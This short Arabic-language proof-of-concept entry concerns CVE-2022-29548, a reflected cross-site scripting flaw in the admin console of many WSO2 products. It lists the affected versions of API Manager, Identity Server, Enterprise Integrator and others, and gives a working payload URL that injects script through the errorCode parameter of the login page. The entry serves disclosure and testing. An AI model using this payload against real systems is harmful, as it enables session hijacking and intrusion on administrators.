
إثبات مفهوم لثغرة XSS المنعكسة (CVE-2022-29548) في وحدات تحكم إدارة منتجات WSO2، مما يتيح هجمات البرمجة النصية عبر المواقع عبر معلمات خطأ تسجيل الدخول المصممة خصيصًا.
إثبات مفهوم لاستغلال CVE-2022-29548: توجد ثغرة XSS منعكسة في وحدة التحكم الإدارية للعديد من منتجات WSO2. يؤثر هذا على API Manager 2.2.0، و2.5.0، و2.6.0، و3.0.0، و3.1.0، و3.2.0، و4.0.0؛ وAPI Manager Analytics 2.2.0، و2.5.0، و2.6.0؛ وAPI Microgateway 2.2.0؛ وData Analytics Server 3.2.0؛ وEnterprise Integrator 6.2.0، و6.3.0، و6.4.0، و6.5.0، و6.6.0؛ وIS as Key Manager 5.5.0، و5.6.0، و5.7.0، و5.9.0، و5.10.0؛ وIdentity Server 5.5.0، و5.6.0، و5.7.0، و5.9.0، و5.10.0، و5.11.0؛ وIdentity Server Analytics 5.5.0 و5.6.0؛ وWSO2 Micro Integrator 1.0.0.
WSO2 API Manager 4.0.0https://localhost:9443/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//